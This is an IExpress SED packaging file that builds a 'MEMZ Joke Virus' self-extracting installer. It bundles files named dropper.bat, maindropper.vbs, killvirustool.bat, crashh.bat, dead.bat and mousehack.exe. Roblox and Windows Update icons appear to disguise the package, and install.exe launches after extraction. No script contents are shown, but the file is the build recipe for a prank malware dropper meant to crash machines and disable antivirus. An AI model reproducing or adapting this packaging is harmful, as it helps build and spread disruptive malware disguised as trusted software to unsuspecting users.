[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=ExtractOnly
ShowInstallProgramWindow=0
HideExtractAnimation=0
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=I
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=Do you want to download MEMZ Joke Virus? NOTE: Read The Steps In Next Page.
DisplayLicense=C:\Users\Administrator\Desktop\MEMZ\licence.txt
FinishMessage=Completed! Enjoy!
TargetName=C:\Users\Administrator\Desktop\MEMZDOWNLOAD.EXE
FriendlyName=Memz Joke Setup Download
AppLaunched=C:\Users\Administrator\Desktop\memz project\install.exe
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="crashconfirm.bat"
FILE1="crashh.bat"
FILE2="crashh.vbs"
FILE3="dead.bat"
FILE4="dropper.bat"
FILE5="F.BAT"
FILE6="fuck.html"
FILE7="gg.vbs"
FILE8="glitching.bat"
FILE9="hehe.vbs"
FILE10="install.bat"
FILE11="install.exe"
FILE12="killvirustool.bat"
FILE13="licence.txt"
FILE14="lolipop.vbs"
FILE15="main.bat"
FILE16="maindropper.vbs"
FILE17="MEMZDOWNLOAD.SED"
FILE18="memzi.txt"
FILE19="mousehack.bat"
FILE20="mousehack.exe"
FILE21="mouseheck.bat"
FILE22="nisuck.vbs"
FILE23="Roblox_Player_2019.ico"
FILE24="Roblox_Player_2019.png"
FILE25="second.bat"
FILE26="stillusingtispc.vbs"
FILE27="third.bat"
FILE28="WindowsUpdate.ico"
[SourceFiles]
SourceFiles0=C:\Users\Administrator\Desktop\MEMZ\
[SourceFiles0]
%FILE0%=
%FILE1%=
%FILE2%=
%FILE3%=
%FILE4%=
%FILE5%=
%FILE6%=
%FILE7%=
%FILE8%=
%FILE9%=
%FILE10%=
%FILE11%=
%FILE12%=
%FILE13%=
%FILE14%=
%FILE15%=
%FILE16%=
%FILE17%=
%FILE18%=
%FILE19%=
%FILE20%=
%FILE21%=
%FILE22%=
%FILE23%=
%FILE24%=
%FILE25%=
%FILE26%=
%FILE27%=
%FILE28%=
